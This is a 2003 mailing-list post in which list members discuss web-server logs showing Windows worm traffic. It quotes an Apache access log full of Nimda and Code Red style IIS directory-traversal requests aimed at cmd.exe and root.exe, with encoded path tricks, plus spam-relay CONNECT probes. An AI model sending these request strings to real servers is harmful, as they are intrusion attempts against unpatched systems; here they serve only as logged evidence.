[plug] Is there *another* Windows worm around?
Kai
vk6ksj at siwa.com.au
Tue Jan 28 19:49:30 WST 2003
> Looks like it could be, yeah. Note all the requests for
> ../winnt/system32/cmd.exe and such. OTOH, many worms aim for cmd.exe one
> way or another, so this could just be a resurgence of an old one. *lol*
> maybe all the MS-SQL admins reinstalled their servers and forgot to
> patch up IIS appropriately...
>
> craig at firewall:~$ tail -n 25 /var/log/apache/access.log
> 202.131.128.228 - - [28/Jan/2003:05:11:11 +0800] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 202.131.128.228 - - [28/Jan/2003:05:11:14 +0800] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 202.131.128.228 - - [28/Jan/2003:05:11:16 +0800] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 249
> 202.131.128.228 - - [28/Jan/2003:05:11:18 +0800] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 249
> 202.131.128.228 - - [28/Jan/2003:05:11:20 +0800] "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
> HTTP/1.0" 404 265
> 202.131.128.228 - - [28/Jan/2003:05:11:22 +0800] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 202.131.128.228 - - [28/Jan/2003:05:11:24 +0800] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 202.131.128.228 - - [28/Jan/2003:05:11:27 +0800] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 202.131.128.228 - - [28/Jan/2003:05:11:29 +0800] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 202.131.128.228 - - [28/Jan/2003:05:11:32 +0800] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 202.131.128.228 - - [28/Jan/2003:05:11:34 +0800] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 202.131.128.228 - - [28/Jan/2003:05:11:39 +0800] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 202.131.128.228 - - [28/Jan/2003:05:11:42 +0800] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 212.103.155.206 - - [28/Jan/2003:06:08:46 +0800] "GET /sumthin HTTP/1.0"
> 404 201
> 80.117.49.128 - - [28/Jan/2003:06:38:33 +0800] "GET /~craig/mp3.html
> HTTP/1.1" 200 25810
> 202.72.156.26 - - [28/Jan/2003:11:26:48 +0800] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 202.72.156.26 - - [28/Jan/2003:11:26:57 +0800] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
> 202.72.156.26 - - [28/Jan/2003:11:27:06 +0800] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 202.72.156.26 - - [28/Jan/2003:11:27:16 +0800] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 202.72.156.26 - - [28/Jan/2003:11:27:26 +0800] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 202.72.156.26 - - [28/Jan/2003:11:27:36 +0800] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 249
> 202.72.156.26 - - [28/Jan/2003:11:27:45 +0800] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 249
> 202.72.156.26 - - [28/Jan/2003:11:27:56 +0800] "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
> HTTP/1.0" 404 265
> 64.229.155.191 - - [28/Jan/2003:12:21:42 +0800] "CONNECT
> maila.microsoft.com:25 / HTTP/1.0" 400 299
> 200.53.176.85 - - [28/Jan/2003:19:07:53 +0800] "GET /sumthin HTTP/1.0"
> 404 201
>
I get those annoying Nimda and Code red accesses on my box on a daily basis,
I would've thought people had their boxes patched by now !
I'm also seeing a lot more of these "CONNECT maila.microsoft.com:25" too !
More information about the plug
mailing list